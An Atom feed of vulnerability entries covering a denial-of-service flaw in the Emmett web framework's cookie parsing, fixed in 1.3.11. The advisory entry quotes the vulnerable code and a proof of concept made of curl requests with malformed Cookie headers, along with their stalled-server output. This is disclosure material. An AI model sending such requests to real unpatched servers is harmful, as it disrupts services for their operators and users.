<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-06T06:18:41.614005+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/cve-2026-25577</id>
    <title>CVE-2026-25577 — Emmett has an Unhandled CookieError Exception Causing Denial of Service</title>
    <updated>2026-10-06T06:18:41.615522+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> emmett-framework core</p>
<p>Emmett is a framework designed to simplify your development process. Prior to 1.3.11, the cookies property in mmett_core.http.wrappers.Request does not handle CookieError exceptions when parsing malformed Cookie headers. This allows unauthenticated attackers to trigger HTTP 500 errors and cause denial of service. This vulnerability is fixed in 1.3.11.</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/cve-2026-25577"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-x6cr-mq53-cc76</id>
    <title>GHSA-x6cr-mq53-cc76 — Emmett-Core: Unhandled CookieError Exception Causing Denial of Service</title>
    <updated>2026-10-06T06:18:41.615576+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> PyPI: emmett-core</p>
<p>### Summary
The `cookies` property in `emmett_core.http.wrappers.Request` does not handle 
`CookieError` exceptions when parsing malformed Cookie headers. This allows 
unauthenticated attackers to trigger HTTP 500 errors and cause denial of service.</p>
<p>### Details</p>
<p>**Location:** `emmett_core/http/wrappers/__init__.py` (line 64)</p>
<p>**Vulnerable Code:**
```python
@cachedprop
def cookies(self) -&gt; SimpleCookie:
    cookies: SimpleCookie = SimpleCookie()
    for cookie in self.headers.get("cookie", "").split(";"):
        cookies.load(cookie)  # No exception handling
    return cookies
```</p>
<p>### PoC
Sending cookies containing special characters such as /(){} will result in insufficient error handling and a server error.
```bash
$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:/security=test"
Internal error
Time: 0.024363s
```
After the same error occurs several times, the server cannot process it normally.
```bash
$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:(security=test"
Internal error
Time: 60.069334s</p>
<p>$ curl -w "\nTime: %{time_total}s\n" http://localhost:8000/ -H "Cookie:security=test"
Internal error
Time: 60.074031s
```</p>
<p>This is server log.
```bash
[2026-02-03 08:23:40,541] ERROR in handlers: Application exception:
Traceback (most recent call last):
  File "/home/geonwoo/.local/lib/python3.13/site-packages/emmett/rsgi/handlers.py", line 70, in dynamic_handler
    http = await self.router.dispatch(request, response)
           ^^^^…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-x6cr-mq53-cc76"/>
  </entry>
</feed>
